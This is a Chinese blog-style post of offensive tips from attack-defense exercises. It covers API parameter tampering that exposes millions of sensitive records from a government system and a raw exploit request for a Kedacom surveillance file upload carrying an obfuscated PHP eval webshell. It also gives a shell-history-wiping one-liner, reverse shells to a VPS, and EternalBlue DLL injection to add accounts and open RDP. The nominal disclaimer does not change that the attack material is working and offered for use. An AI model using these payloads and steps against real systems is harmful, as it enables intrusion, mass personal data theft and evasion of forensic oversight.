前言

作为资历混子Web🐶，日常负责端茶倒水之余，浅谈下如何在如今全是大牛子环境下存活，发挥出牛马个人最大价值，Hvv巧妙Nday利用，本文仅此记录学习分享，如若有不对之处，望大佬们指正。

免责声明：

由于传播、利用Polaris本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责。仅记录学习使用。

正文

接口泄露

政务、教育行业作为最常见突破点，寻找学号，工号，弱口令进入后台，sql/文件上传等拿Webshell权限。因此会多人忽略数据泄露分.

某政X单位，注册进入后台，个人信息查询处简单fuzz一下进行后端传参校验碰撞，导致拼接替换参数造成获取X百万敏感信息。

            https://www.xxx.com/1234/qqquser/detaili?id=xxx
          

正常查询，替换接口如下：

            https://www.xxx.com/1234/qqquser/list?size=1
          

            https://www.xxx.com/1234/qqquser/detaili
          

缺少参数报错，得到的值为百万级。

            https://www.xxx.com/1234/qqquser/exportList?xzqhcode=xxxxxx
          

且通过接口发现123456处为省份邮政编码，再次替换遍历接口。

重复以上操作，替换邮政编码与ID值，最终获取X百万级敏感信息。

            https://github.com/gh0stkey/HaE/
          
            https://github.com/gh0stkey/CaA/
          

（此处推荐插件Hae与CaA，通过数据包正则匹配高亮定位敏感信息，结合CaA收集的参数接口用于方便Fuzz）

Nday积累

往年Hvv前网上都会爆出大量Poc文档、库等，但多数都不太全。或由于漏洞敏感导致后期漏洞已下架等。建议汇总编写整理漏洞库payload自行写成验证工具效率加倍。参考Xray模板，嵌套就行。

(文章末尾整理了近年较全漏洞库)

Kedacom视频监控系统-Nday

某次攻防中碰到的Kedacom视频监控系统任意文件上传。

POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName=
            aaa.php
           HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryContent-Length: 164----WebKitFormBoundaryContent-Disposition: form-data; name="Filedata": filename="aaa"Content-Type: application/octet-streamtest123----WebKitFormBoundary--

Content-Disposition: form-data; name=="file";filename=1<php<<<<Content-Type: image/jpg<hqiu fang guo%>?=$a=<<<   aaassasssasssasssasssasssasssasssasssasssasssssssssssssaasssassssaa;fwrite(fopen("
            ppp888.php"
          ,"a"),'<?php*asas111*/eval/*asas111*/(/*asas111*/base64_decode/*asas111*/(base64ecode/*asas111*/(base64ecode/*asas111*/($_POST/*asas111*/["a"])))/*asas111*/)/*asas111*/:')?>-----------------35803941388997298198758721635Content-Disposition: form-data; name="submit"

存在Waf，天蝎马二次编码后成功上传解析。

绕过思路综合脑图：

进入内网：

遇到Linux系统优先考虑禁用历史命令记录功能：

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 

由于权限较低且操作系统为32位的Linux，反弹shell到VPS，可执行命令。

Tips： 热门内网扫描器无法使用时，可用gogo进行内网扫描。

            https://chainreactors.github.io/wiki/gogo/
          

永恒之蓝：MSF反弹shell易打蓝屏，工具dll注入账号密码，编写把开RDP也加进该dll文件。

            https://github.com/abc123info/EquationToolsGUI
          

添加隧道代理，找到多网卡主机，跨网段。

海康未授权。（Yakit的Fuzz接口好用些。）剩下就常规内网梭哈了，刷完收工。

获取方式

本公众号回复【20250504】即可获取往年Poc汇总整理打包+文中脑图与工具